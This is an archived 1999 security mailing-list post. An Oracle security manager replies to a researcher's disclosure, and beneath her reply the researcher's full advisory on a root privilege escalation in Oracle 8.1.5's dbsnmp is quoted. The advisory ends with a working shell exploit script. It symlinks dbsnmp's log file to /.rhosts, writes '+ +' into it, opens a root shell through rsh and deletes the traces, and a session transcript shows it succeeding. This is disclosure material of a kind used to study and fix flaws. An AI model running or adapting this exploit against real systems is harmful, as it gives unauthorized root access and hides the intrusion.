Potential vulnerability in Oracle

From: Mary Ann Davidson (madavidsat_private)
Date: Thu Nov 18 1999 - 15:12:48 PST

    Hi Brock

    Your note concerning a possible security vulnerability in Oracle (text
    below) was forwarded to me. This vulnerability has indeed been diagnosed
    and fixed already. Here is the scoop on where you can obtain fixes:

    SUPPORTED CUSTOMERS:
    The alert and 5 patches are posted on metalink:

    UNSUPPORTED CUSTOMERS:
    The alert and 5 patches are posted on OTN:

    This was also issued as an ISS alert.

    Regarding your comment about reporting these issues to Oracle, we do
    have an internal process in place for expediting the way we handle
    potential security vulnerabilities, but we believe it's best to have all
    potential bugs come through Oracle World Wide Support first, after which
    they are diagnosed, and expedited as required.

    Thank you for your interest in Oracle and security.

    Yours very truly,

    Mary Ann Davidson

    Mary Ann Davidson
    Group Product Manager, Security
    Server Technologies
    Oracle Corporation
    (650) 506 5464
    No ka moana ku'u mele; no na halu au e hula ai.
            "From the ocean comes my song; of the waves I dance my dance."

     OVERVIEW
     A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any
    user
     to obtain root privileges.

     BACKGROUND
     My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition.
     This shouldn't make any difference, however, and I would consider any
     UNIX Oracle implementation to be exploitable.

     DETAILS
    When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by
     default) will dump two log files out into pwd, dbsnmpc and dbsnmpt .
    If
     these files do not exist, dbsnmpd will attempt to create them mode 666
     and dump around 400 bytes of uncontrolable output into them.  If the
     files do exist, dbsnmp will append these 400 bytes but not change the
     permissions.  Thus if root does not have an .rhosts file, we can obtain

     root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts.  One
     thing to note about the exploit is that on my particular
    implementation,
     a normal user does not have read access above /product/ in the Oracle
     path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp).  This
     won't prevent you from running the exploit since the execute bit is set

     for world on all of Oracle's directories, but you may have to guess
     about the location of dbsnmp.  This can usually done by examining the
     process list for Oracle entries.

     EDITORIAL
     One small rant about Oracle is their ridiculously complicated bug
     reporting scheme, which asks you 2814 questions and allows you ONE line

     of text to explain your problem.  In this day and age, I don't
     understand why every major software vendor doesn't have something as
     simple as a mailto securityat_private SOMEWHERE on their site.  In
     fact, when I searched Oracle's web page, I got zero hits on the word
     "security".  Perhaps this address does exist and a bugtraq reader would

     care to enlighten me.

     EXPLOIT

       oracle8% uname -a; id
       SunOS oracle8 5.6 Generic_105181-05 sun4u sparc
       SUNW,Ultra-5_10
       uid=102(btellier) gid=10(staff)
       oracle8% /tmp/oracle.sh
       couldn't read file "/config/nmiconf.tcl": no such file or directory
       Failed to initialize nl component,error=462
       Failed to initialize nl component,error=462
       #
     --- oracle.sh ---
       #!/bin/sh
       # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
       # You'll probably have to change your path to dbsnmp
       # Exploit will only work if /.rhosts does NOT exist
       #
       # Brock Tellier btellierat_private
       cd /tmp
       unset ORACLE_HOME
       umask 0000
       ln -s /.rhosts /tmp/dbsnmpc.log
       /u01/app/oracle/product/8.1.5/bin/dbsnmp
       echo "+ +" > /.rhosts
       rsh -l root localhost 'sh -i'
       rsh -l root localhost rm /tmp/*log*
       rsh -l root localhost rm /.rhosts